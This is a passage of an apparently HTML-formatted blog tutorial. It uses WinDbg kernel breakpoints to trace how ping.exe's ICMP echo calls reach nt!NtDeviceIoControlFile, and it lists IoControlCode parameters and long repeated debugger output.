<div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> <b><span style="color: red;">1st param: FileHandle > 0000074c</span></b></span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> <span style="color: yellow;"> 2nd param: Event > 00000744</span></span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> 3rd param: ApcRoutine > 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> 4th param: ApcContext > 00000000</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> 5th param: IoStatusBlock > 000a4720</span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> <b> <span style="color: red;">6th param: IoControlCode > 00120000</span></b></span></div><div style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> <span style="color: yellow;">7th param: InputBuffer > 000a4bf0</span></span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> 8th param: InputBufferLength > 00001ff8</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> 9th param: OutputBuffer > 000a2730</span></div><div style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"> 10th param: OutputBufferLength > 00001ff0</span></div></blockquote><br />
<ul><li>IoControlCode = 0x120000</li>
</ul><div style="text-align: center;">File Device Type = FILE_DEVICE_NETWORK</div><div style="text-align: center;"> Access = FILE_ANY_ACCESS<br />
Method = METHOD_BUFFERED </div><div style="text-align: center;"><br />
</div><div style="color: blue; text-align: left;"><span style="font-size: x-large;">Inside the Kernel</span></div><div style="text-align: left;"><br />
<ol><li>NtDeviceIoControlFile</li>
<ul><li>In order to go to the kernel mode function of <b>NtDeviceIoControlFile</b>, we set the breakpoint at the Windows native system service <b>nt!NtDeviceIoControlFile</b> and also a breakpoint at the caller to function <b>IcmpSendEcho2</b>:</li>
</ul></ol><blockquote><span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> <span style="color: yellow;"> kd> bp nt!NtDeviceIoControlFile "!handle esp+4;dd esp lb"</span> <span style="color: #38761d;">// Show the object handle and the parameters</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="color: yellow;"> kd> bp ping!main+0x9ad</span></span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> kd> bl</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0 e 8056d590 0001 (0001) nt!NtDeviceIoControlFile "!handle esp+4;dd esp lb"</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 d 76d6b73c 0001 (0001) iphlpapi!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 e 01002376 0001 (0001) ping!main+0x9ad</span></span></blockquote><ul><ul><li>The purpose of doing this is to obtain a list of <b>IoControlCode</b> passed to the kernel immediately after <b>ping</b> send ICMP echo. We will stop collecting <b>Iocontrolcode</b> when breakpoint hits back <b>ping!main+0x9ad</b>.</li>
<li>First <b>IoControlCode</b> sent to kernel. Notice that the <b>IoControlCod</b>e, process's name and handle match exactly what we got in User Mode above (highlighted in <b style="color: red;">red</b>)</li>
</ul></ul><blockquote> <span style="color: yellow; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153f020</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153f020 SessionId: 0 Cid: 05cc Peb: 7ffde000 ParentCid: 0298</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340280 ObjectTable: e1ac1728 HandleCount: 47.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: ping.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00720add</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f93a5d38 8053ca28 0000074c 00000744 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f93a5d48 00000000 000a4720 00120000 000a4bf0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f93a5d58 00001ff8 000a2730 00001ff0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span></span></blockquote><ul><ul><li> Second <b>IoControlCode</b> is passed by the <b>explorer.exe</b>:</li>
</ul></ul><blockquote> <span style="color: yellow; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f750 00120003 00c9f778</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f7b8 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span></span> </blockquote><ul><ul><li> The list is very long and there are many duplicated <b>IoControlCode</b> being sent to kernel:</li>
</ul></ul><blockquote> <span style="color: yellow; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f750 00120003 00c9f778</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f7b8 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f750 00120003 00c9f778</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f7b8 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 000004ac 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f784 00120040 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 01fc8008 00000c30</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f500 00120003 00c9f5ac</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00168858 00000100</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f4e0 00120003 00c9f508</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f548 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 0000031c 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f4e0 00120003 00c9f508</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f548 0000005c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 000004ac 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f514 00120040 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 0018ad70 00000c30</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f6d0 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f74c 000000e1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f6d0 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f544 00120003 00c9f6d4</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000024 00c9f74c 000000e1</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 330.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 000004ac 00000218 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad48 00000000 00c9f5a4 00120090 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad58 00000000 00169078 00000030</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> nt!NtDeviceIoControlFile:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 8056d590 8bff mov edi,edi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> g</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> processor number 0, process 8153d8a0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 8153d8a0 SessionId: 0 Cid: 01d0 Peb: 7ffdf000 ParentCid: 017c</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 08340220 ObjectTable: e1ac1ba8 HandleCount: 329.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: explorer.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Kernel Handle table at e166a000 with 177 Entries in use</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Unable to get _HANDLE_TABLE_ENTRY : 00000a78</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> f75dad38 8053ca28 00000550 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier 